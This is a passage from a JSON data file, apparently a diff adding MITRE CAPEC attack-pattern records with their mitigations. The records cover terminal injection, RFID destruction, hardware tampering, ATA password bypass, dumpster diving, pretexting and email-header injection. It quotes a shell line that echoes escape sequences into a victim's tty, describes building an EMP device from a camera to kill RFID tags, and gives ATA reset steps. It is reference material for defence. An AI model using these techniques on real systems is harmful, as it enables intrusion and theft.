world-writable) or the attacker is an administrator, then a series of commands in this format can be used to echo commands out to victim terminals.\n \"$echo -e \"\\033[30m\\033\\132\" > /dev/ttyXX\n where XX is the tty number of the user under attack. This will paste the characters to another terminal (tty). Note this technique works only if the victim's tty is world writable (which it may not be). That is one reason why programs like write(1) and talk(1) in UNIX systems need to run setuid.\" [REF-1]\n If the victim continues to hit \"enter\" and execute the commands, there are an endless supply of vectors available to the attacker, copying files, open up network connections, ftp out to servers, and so on.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify attacker-writable terminals: Determine if users TTYs are writable by the attacker.

  2. Techniques
    Determine the permissions for the TTYs found on the system. Any that allow user write to the TTY may be vulnerable.
    Attempt to write to other user TTYs. This approach could leave a trail or alert a user.

Exploit

  1. Execute malicious commands: Using one or more vulnerable TTY, execute commands to achieve various impacts.

  2. Techniques
    Commands that allow reading or writing end user files can be executed.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "User terminals must have a permissive access control such as world writeable that allows normal users to control data on other user's terminals." + ], + "x_capec_resources_required": [ + "Access to a terminal on the target network" + ], + "x_capec_skills_required": { + "Low": "Ability to discover permissions on terminal devices. Of course, brute force can also be used." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure that terminals are only writeable by named owner user and/or administrator", + "id": "course-of-action--022f6443-4421-4a54-beb6-d471aad577cb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-40-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f41d0244-df5c-41e8-9fd1-046642dd7609", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--022f6443-4421-4a54-beb6-d471aad577cb", + "spec_version": "2.1", + "target_ref": "attack-pattern--326dfb79-2d81-406a-9977-79e67d8de6e2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b79f1d6a-d501-4456-9de3-b3cf4778b8f1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "spec_version": "2.1", + "target_ref": "attack-pattern--326dfb79-2d81-406a-9977-79e67d8de6e2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses methods to deactivate a passive RFID tag for the purpose of rendering the tag, badge, card, or object containing the tag unresponsive. RFID tags are used primarily for access control, inventory, or anti-theft devices. The purpose of attacking the RFID chip is to disable or damage the chip without causing damage to the object housing it.", + "external_references": [ + { + "external_id": "CAPEC-400", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/400.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--309b5fec-8a59-4d28-8a1c-427d289aad93", + "modified": "2022-02-22T00:00:00.000Z", + "name": "RFID Chip Deactivation or Destruction", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_extended_description": "\n When correctly performed the RFID chip can be disabled or destroyed without visible damage or marking to whatever item or device containing the chip. Attacking the chip directly allows for the security device or method to be bypassed without directly damaging the device itself, such as an alarm system or computer system. 
Various methods exist for damaging or deactivating RFID tags. For example, most common RFID chips can be permanently destroyed by creating a small electromagnetic pulse near the chip itself. One method employed requires the modifying a disposable camera by disconnecting the flash bulb and soldering a copper coil to the capacitor. Firing the camera in this configuration near any RFID chip-based device creates an EMP pulse sufficient to destroy the chip without leaving evidence of tampering. So far this attack has been demonstrated to work against RFID chips in the 13.56 MHz range.\n ", + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in access control to gain access to currently installed hardware and precedes to implement changes or secretly replace a hardware component which undermines the system's integrity for the purpose of carrying out an attack.", + "external_references": [ + { + "external_id": "CAPEC-401", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/401.html" + }, + { + "external_id": "CWE-1263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1263.html" + } + ], + "id": "attack-pattern--fdf61d51-9432-47d3-9376-7cf51fc86176", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Physically Hacking Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--7fd3928c-accb-4a35-ba64-000339399ede" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "A malicious subcontractor or subcontractor's employee that is responsible for system maintenance secretly replaces a hard drive with one 
containing malicious code that will allow for backdoor access once deployed." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--6aac48b7-c277-46ba-b9c0-523471a84c11" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in ATA security on a drive to gain access to the information the drive contains without supplying the proper credentials. ATA Security is often employed to protect hard disk information from unauthorized access. The mechanism requires the user to type in a password before the BIOS is allowed access to drive contents. Some implementations of ATA security will accept the ATA command to update the password without the user having authenticated with the BIOS. This occurs because the security mechanism assumes the user has first authenticated via the BIOS prior to sending commands to the drive. Various methods exist for exploiting this flaw, the most common being installing the ATA protected drive into a system lacking ATA security features (a.k.a. hot swapping). 
Once the drive is installed into the new system the BIOS can be used to reset the drive password.", + "external_references": [ + { + "external_id": "CAPEC-402", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/402.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Oliver Tennert, Using the ATA security features of modern hard disks and SSDs, 2014, Admin Magazine", + "external_id": "REF-701", + "source_name": "reference_from_CAPEC", + "url": "https://www.admin-magazine.com/Archive/2014/19/Using-the-ATA-security-features-of-modern-hard-disks-and-SSDs" + }, + { + "description": "Breaking ATA Password Security, The University of Texas at Austin Information Security Office", + "external_id": "REF-702", + "source_name": "reference_from_CAPEC", + "url": "https://security.utexas.edu/education-outreach/BreakingATA" + } + ], + "id": "attack-pattern--6aac48b7-c277-46ba-b9c0-523471a84c11", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Bypassing ATA Password Security", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--fdf61d51-9432-47d3-9376-7cf51fc86176" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "\n The A-FF Repair Station tool is a data recovery utility that can be used for ATA password removal (both High and Maximum level) and firmware area recovery. 
An adversary with access to this tool could reset the ATA password to bypass this security feature and unlock the hard drive. The adversary could then obtain any data contained within the drive. [REF-702]\n ", + "\n An adversary gains physical access to the targeted hard drive and installs it into a system that does not support ATA security features. Once the drive is installed in the feature-lacking system, the adversary is able to reset the hard drive password via the BIOS. As a result, the adversary is able to bypass ATA password security and access content on the drive.\n " + ], + "x_capec_prerequisites": [ + "Access to the system containing the ATA Drive so that the drive can be physically removed from the system." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid using ATA password security when possible.", + "id": "course-of-action--6517b3e0-2d56-4f34-b75e-67e8a327434d", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-402-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3377c55f-aabe-4243-9923-088c08ad5f3f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6517b3e0-2d56-4f34-b75e-67e8a327434d", + "spec_version": "2.1", + "target_ref": "attack-pattern--6aac48b7-c277-46ba-b9c0-523471a84c11", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": 
"Use full disk encryption to protect the entire contents of the drive or sensitive partitions on the drive.", + "id": "course-of-action--42bee69d-54e9-4b16-8e31-ea5eadd37120", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-402-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3007f9eb-cd21-4e1f-b66e-4faf4bc852de", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--42bee69d-54e9-4b16-8e31-ea5eadd37120", + "spec_version": "2.1", + "target_ref": "attack-pattern--6aac48b7-c277-46ba-b9c0-523471a84c11", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage third-party utilities that interface with self-encrypting drives (SEDs) to provide authentication, while relying on the SED itself for data encryption.", + "id": "course-of-action--e68d238e-2bf8-4a45-ad2d-e5217401df20", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-402-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1e1565d8-9f05-4df6-8075-d2aab55a1c8a", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--e68d238e-2bf8-4a45-ad2d-e5217401df20", + "spec_version": "2.1", + "target_ref": "attack-pattern--6aac48b7-c277-46ba-b9c0-523471a84c11", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern. Please refer to CAPEC-118 : Collect and Analyze Information.", + "external_references": [ + { + "external_id": "CAPEC-404", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/404.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--93f7216f-ddbe-4484-8fa6-87b680f16898", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Social Information Gathering Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern. 
Please refer to CAPEC-118 : Collect and Analyze Information.", + "external_references": [ + { + "external_id": "CAPEC-405", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/405.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--d4fd1606-6a28-4831-956b-ceab18f3546a", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Social Information Gathering via Research", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary cases an establishment and searches through trash bins, dumpsters, or areas where company information may have been accidentally discarded for information items which may be useful to the dumpster diver. The devastating nature of the items and/or information found can be anything from medical records, resumes, personal photos and emails, bank statements, account details or information about software, tech support logs and so much more, including hardware devices. 
By collecting this information an adversary may be able to learn important facts about the person or organization that play a role in helping the adversary in their attack.", + "external_references": [ + { + "external_id": "CAPEC-406", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/406.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--756a1a93-3734-426c-9e91-f9339de74a7a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Dumpster Diving", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1", + "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Documents and materials improperly disposed of can lead to information disclosure if an adversary comes across it.)" + ] + }, + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_prerequisites": [ + "An adversary must have physical access to the dumpster or downstream processing facility." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in pretexting behavior to solicit information from target persons, or manipulate the target into performing some action that serves the adversary's interests. 
During a pretexting attack, the adversary creates an invented scenario, assuming an identity or role to persuade a targeted victim to release information or perform some action. It is more than just creating a lie; in some cases it can be creating a whole new identity and then using that identity to manipulate the receipt of information.", + "external_references": [ + { + "external_id": "CAPEC-407", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/407.html" + }, + { + "description": "Gather Victim Identity Information", + "external_id": "T1589", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1589" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Pretexting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1" + ], + "x_capec_child_of_refs": [ + "attack-pattern--eedaef1c-c3fb-4135-a1b5-4b186b9da854", + "attack-pattern--5c60a410-64a7-46e2-9d46-82a232a6ce3e" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Depending on the adversary's intentions and the specific nature their actions/requests, a successful pretexting attack can result in the compromise to the confidentiality of sensitive information in a variety of contexts.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Social Engineering", + "Software" + ], + "x_capec_example_instances": [ + "The adversary dresses up like a jogger and runs in place by the entrance of a building, pretending to look for their access 
card. Because the hood obscures their face, it may be possible to solicit someone inside the building to let them inside." + ], + "x_capec_extended_description": "\n Pretexting can also be used to impersonate people in certain jobs and roles that they never themselves have done. In simple form, these attacks can be leveraged to learn information about a target. More complicated iterations may seek to solicit a target to perform some action that assists the adversary in exploiting organizational weaknesses or obtaining access to secure facilities or systems. Pretexting is not a one-size fits all solution. Good information gathering techniques can make or break a good pretext. A solid pretext is an essential part of building trust. If an adversary’s alias, story, or identity has holes or lacks credibility or even the perception of credibility the target will most likely catch on.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--2a8a634e-cf1f-4b2e-9a71-1ab8e6bb16d0", + "attack-pattern--2d533987-71b1-41a3-873b-38d63188d2eb", + "attack-pattern--5e0c909b-70a3-4275-a696-91801247ed68", + "attack-pattern--7ed74d19-ed2b-40c4-a63c-54367b2653c4", + "attack-pattern--490fc09c-a624-44cd-8e9e-f4ce8ad2311e" + ], + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner.The adversary must have knowledge of the pretext that would influence the actions of the specific target." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An organization should provide regular, robust cybersecurity training to its employees to prevent successful social engineering attacks.", + "id": "course-of-action--e2e37142-f4ef-407a-a43e-f0e3ecad8596", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-407-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bff09429-66bb-4bc2-90be-eb28271786e4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e2e37142-f4ef-407a-a43e-f0e3ecad8596", + "spec_version": "2.1", + "target_ref": "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern. 
Please refer to CAPEC-118 : Collect and Analyze Information.", + "external_references": [ + { + "external_id": "CAPEC-408", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/408.html" + } + ], + "id": "attack-pattern--4b3c7a8c-f801-43d9-9ba7-1d0e2dc87e8b", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Information Gathering from Traditional Sources", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern. Please refer to CAPEC-118 : Collect and Analyze Information.", + "external_references": [ + { + "external_id": "CAPEC-409", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/409.html" + } + ], + "id": "attack-pattern--0082c733-5245-47ca-a349-6c9fe34114f1", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Information Gathering from Non-Traditional Sources", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of attack involves an attacker leveraging meta-characters in email headers to inject improper behavior into email programs. Email software has become increasingly sophisticated and feature-rich. In addition, email applications are ubiquitous and connected directly to the Web making them ideal targets to launch and propagate attacks. 
As the user demand for new functionality in email applications grows, they become more like browsers with complex rendering and plug in routines. As more email functionality is included and abstracted from the user, this creates opportunities for attackers. Virtually all email applications do not list email header information by default, however the email header contains valuable attacker vectors for the attacker to exploit particularly if the behavior of the email client application is known. Meta-characters are hidden from the user, but can contain scripts, enumerations, probes, and other attacks against the user's system.", + "external_references": [ + { + "external_id": "CAPEC-41", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/41.html" + }, + { + "external_id": "CWE-150", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/150.html" + }, + { + "external_id": "CWE-88", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/88.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--30047c4f-cbf1-48ff-906c-3c6d58feb1a1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using Meta-characters in E-mail Headers to Inject Malicious Payloads", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128", + "attack-pattern--3e3f4570-827b-4e0e-859b-00a4b13a1a65" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software", + "Software" + ], + "x_capec_example_instances": [ + "\n To:From:Headerdef: whatever\n ", + "\n Meta-characters are among the most valuable tools attackers have to deceive users into taking some action on their behalf. E-mail is perhaps the most efficient and cost effective attack distribution tool available, this has led to the phishing pandemic.\n Meta-characters like \\w \\s \\d ^ can allow the attacker to escape out of the expected behavior to execute additional commands. Escaping out the process (such as email client) lets the attacker run arbitrary code in the user's process.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Experiment

  1. Identify and characterize metacharacter-processing vulnerabilities in email headers: An attacker creates emails with headers containing various metacharacter-based malicious payloads in order to determine whether the target application processes the malicious content and in what manner it does so.

  2. Techniques
    Use an automated tool (fuzzer) to create malicious emails headers containing metacharacter-based payloads.
    Manually tampering email headers to inject malicious metacharacter-based payload content in them.

Exploit

  1. An attacker leverages vulnerabilities identified during the Experiment Phase to inject malicious email headers and cause the targeted email application to exhibit behavior outside of its expected constraints.

  2. Techniques
    Send emails with specifically-constructed, metacharacter-based malicious payloads in the email headers to targeted systems running email processing applications identified as vulnerable during the Experiment Phase.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "This attack targets most widely deployed feature rich email applications, including web based email programs." + ], + "x_capec_skills_required": { + "Low": "To distribute email" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Perform validation on email header data", + "id": "course-of-action--361f2be0-52ef-4735-8cc4-8a426c93ca0b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-41-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dc743c69-d4ac-4767-91af-c4ef9e82f50a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--361f2be0-52ef-4735-8cc4-8a426c93ca0b", + "spec_version": "2.1", + "target_ref": "attack-pattern--30047c4f-cbf1-48ff-906c-3c6d58feb1a1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Implement email filtering solutions on mail server or on MTA, relay server.", + "id": "course-of-action--b3921afe-87f5-45f4-9cd6-6f64aa39debb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-41-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": 
"2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--78fc3fe0-3e55-40a5-af05-614cea38688b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b3921afe-87f5-45f4-9cd6-6f64aa39debb", + "spec_version": "2.1", + "target_ref": "attack-pattern--30047c4f-cbf1-48ff-906c-3c6d58feb1a1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Mail servers that perform strict validation may catch these attacks, because metacharacters are not allowed in many header variables such as dns names", + "id": "course-of-action--06350ba3-c63f-43d3-85a9-3d4be370deba", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-41-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5cba6ee4-dbac-4c77-8236-a6fcf7036196", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--06350ba3-c63f-43d3-85a9-3d4be370deba", + "spec_version": "2.1", + "target_ref": "attack-pattern--30047c4f-cbf1-48ff-906c-3c6d58feb1a1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages an individual using any combination of social engineering methods for the purpose of extracting 
